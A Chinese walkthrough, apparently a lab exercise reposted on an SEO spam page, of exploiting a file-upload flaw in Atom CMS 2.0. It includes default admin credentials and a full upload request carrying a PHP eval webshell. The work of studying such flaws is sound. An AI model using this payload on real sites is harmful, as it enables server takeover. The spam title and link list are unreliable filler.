当前位置: 首页 > news >正文

网络绿化网站建设哪家专业百度店铺免费入驻

网络绿化网站建设哪家专业,百度店铺免费入驻,用自己电脑建网站,寺院网站建设漏洞描述:Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。 其实这就是一个文件上传漏洞罢了。。。。 打开之后,/home路由是个空白 信息搜集&…

漏洞描述:Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。

其实这就是一个文件上传漏洞罢了。。。。

打开之后,/home路由是个空白

image-20240210064833778

信息搜集:该cms有默认邮箱/密码 alan@alan.com/password,到/admin路由下尝试登录。

image-20240210065002672

Users下有个上传文件功能,可能是上传头像用的。

image-20240210065136974

image-20240210065150788

抓包中无文件上传的内容????(奇奇怪怪)

看了一下,漏洞路由在/admin/uploads.php,直接在界面中点击到不了这个路由。。。。

直接修改刚刚的包吧

image-20240210070630756

直接传php文件,这cms写的真shit

Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg<?php @eval($_POST['cmd']);?>
-----------------------------30623082103363803402542706041--

image-20240210070907146

访问木马存储路由/uploads/1707520195231.phpgetshell

image-20240210071158225

http://www.cadmedia.cn/news/1066.html

相关文章:

  • 公司做网站要注意什么淘宝推广运营
  • 网站设计与建设公司百度服务中心
  • 装修公司网站该怎么做站长工具seo综合查询分析
  • 手机网站建设咨询网络推广外包联系方式
  • seo关键词怎么优化seo网络推广哪家专业
  • 北京网络营销的培训课程淄博seo
  • 深圳做棋牌网站建设哪家服务好百度上做推广怎么收费
  • 郑州建设企业网站找哪个公司关键词优化和seo
  • 怎样申请注册公司网站整合营销活动策划方案
  • 潭州教育网站开发株洲网站设计外包首选
  • 网站站点建设端口号的作用域名推荐
  • 软件工程师发展前景优化营商环境的措施建议
  • 京东商城网官网 网上购物平台优化网站标题
  • 昆明网站建设首选互维baidu百度一下
  • 简洁型网页优化系统
  • 怎么理解搜索引擎优化优化师和运营区别
  • 苏州免费模板建站论坛推广的步骤
  • 株洲网站建设网站买卖友链
  • 广州网站建设流程图百度爱采购竞价
  • 苏州展示型网站建设免费入驻的卖货平台
  • 5网站建设公司自己可以创建网站吗
  • 北京网站建设公司报价怎么开通百度推广账号
  • 最棒的网站建设论坛推广软件
  • 政府行业网站建设方案关键词在线优化
  • 杨凌开发建设局网站网店怎么开
  • 免费自助建站软件seo公司多少钱
  • 郑州做网站优化运营商百度热点榜单
  • 湛江网站建设公司汕头网站建设开发
  • 网站需求分析模板新闻热点
  • 网站建设站点无法发布优化什么